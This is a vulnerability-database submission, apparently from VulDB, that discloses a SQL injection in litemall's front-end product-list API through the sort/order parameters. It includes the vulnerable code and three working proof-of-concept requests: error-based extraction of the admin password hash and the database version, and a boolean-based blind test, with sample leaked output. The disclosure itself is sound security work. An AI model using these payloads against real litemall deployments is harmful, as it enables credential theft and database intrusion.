提交 #811467: linlinjava litemall up to 1.8.0 SQL Injection信息

标题	linlinjava litemall up to 1.8.0 SQL Injection
描述	A critical vulnerability was found in linlinjava litemall （https://github.com/linlinjava/litemall）up to 1.8.0. This vulnerability affects the list function of WxGoodsController.java in the front-end WeChat API. The manipulation of the argument sort/order leads to SQL injection. IMPORTANT: Unlike previously reported CVEs (CVE-2024-24323, CVE-2024-46382) which require ADMIN authentication via Shiro, this vulnerability exists in the front-end API (/wx/goods/list) which is accessible to REGULAR USERS without admin privileges. This makes it significantly more severe (CVSS 8.8 vs 7.2). Vulnerable code in WxGoodsController.java: @GetMapping("list") public Object list(@RequestParam(defaultValue="add_time") String sort, @RequestParam(defaultValue="desc") String order, ...) LitemallGoodsService.java line 121-122: if (!StringUtils.isEmpty(sort) && !StringUtils.isEmpty(order)) { example.setOrderByClause(sort + " " + order); } MyBatis: order by ${orderByClause} No @Sort whitelist annotation is applied to WxGoodsController. PoC 1 - Extract admin password hash from FRONT-END (no admin auth required): GET /wx/goods/list?sort=extractvalue(1,concat(0x7e,(SELECT password FROM litemall_admin LIMIT 1),0x7e))&order=asc&page=1&limit=10 Response error: XPATH syntax error: '~$2a$10$.rEfyBb/GURD9P2p0fRg/OAJ' Admin bcrypt hash leaked from front-end API! PoC 2 - Extract MySQL version: GET /wx/goods/list?sort=extractvalue(1,concat(0x7e,version(),0x7e))&order=asc Response error: XPATH syntax error: '~8.0.45~' PoC 3 - Boolean-based blind: GET /wx/goods/list?sort=IF(1=1,id,name)&order=asc -> sorted by id GET /wx/goods/list?sort=IF(1=2,id,name)&order=asc -> sorted by name Different order confirms injection. Comparison: CVE-2024-24323/CVE-2024-46382 require admin Shiro session. THIS vulnerability requires only regular user auth or no auth at all. Reporter: berna ([email protected])
来源	⚠️ https://gist.github.com/A1AAAAAAAAAA1/ab8df4181f9311cb9e7dad905e9aa512
用户	berna (UID 97558)
提交	2026-04-23 16時38分 (1 月前)
管理	2026-05-17 11時36分 (24 days later)
状态	已接受
VulDB条目	364396 [linlinjava litemall 直到 1.8.0 Front-end WeChat API WxGoodsController.java list SQL注入]
积分	20

◂ 上一步一览下一步 ▸

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!